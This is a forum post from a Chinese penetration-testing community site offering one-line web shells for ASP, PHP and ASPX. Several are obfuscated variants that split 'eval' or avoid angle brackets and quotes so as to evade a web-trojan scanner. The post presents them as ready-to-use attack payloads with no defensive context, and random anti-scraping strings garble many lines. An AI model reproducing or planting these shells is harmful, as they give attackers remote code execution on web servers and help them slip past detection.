中国网络渗透测试联盟

标题: 过雷克图一句话木马 [打印本页]
作者: admin    时间: 2012-9-23 14:36
标题: 过雷克图一句话木马
asp一句话  <%execute(request("1"))%>  % j  ]; V% `5 |9 L0 r4 }, e" x
& K6 p" q. ]' ~* M% S
php一句话  <?php eval($_POST[1]);?>  
: E3 D, S1 f- M# O. g  j) c1 q
+ P0 B& k. _, N, ~& V, laspx一句话
" `; }& E. \3 @# p' p
0 B1 l8 B9 R% {% e4 X% B/ X$ D<script language="C#" runat="server">, A5 K9 g7 b) X* ]& B

0 V  y$ Y/ f, e& l! SWebAdmin2Y.x.y aaaaa = new  WebAdmin2Y.x.y   ("add6bb58e139be10");" C* o+ a! P8 y- P

/ k, C& d! l% ]# P: x</script>
* y( v8 k7 k$ q: l: I! ~; `, c: b$ Z4 H, d* x
可以躲过雷客图的一句话。/ ~1 V5 y. j4 z* @: J

# B) t1 _; L4 R6 _/ u  E  <%
/ r6 Z3 g2 s9 H! }% j9 G6 |! W* }& i
  set ms = server.CreateObject("MSScriptControl.ScriptControl.1")0 N$ D' f, l5 c7 `
. x, A5 l5 F$ h. O0 w
  ms.Language="VBScript"
" g& g( g' T! S$ l- W
# g' o  P% _5 Q+ K9 _3 E' O  ms.AddObject "Response", Response
2 l) c; Z* X; l8 D+ Q# I! y& p8 o/ H; [3 |4 r6 o
  ms.AddObject "request", request
! T: l: Z1 I! ?' g: a1 R* U2 K. |% \1 E
  ms.ExecuteStatement("ev"&"al(request(""1""))")
3 m: A* a9 o8 S. }' B
5 b$ ]7 G; e" r4 r! B# I6 h- V1 v) k  %>
2 [5 J; Y- ]3 X* t# D, F+ O
5 r$ Z2 v5 ]* i  C  不用'<,>'的asp一句话9 D3 p8 Y( [( |6 s& M% `
1 L1 ^7 U/ H* w* C- Q; _
  <script language=VBScript runat=server>execute request("1")</script>. R6 m$ r  x0 s. G  U

" s2 d7 D' M* D  不用双引号的一句话。* X! a: M4 J- Z+ F

( t# k3 W) }  b/ \" ~: b1 Z  <%eval request(chr(35))%>
% ]% J1 ?" c, n2 ^& r  s* L



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2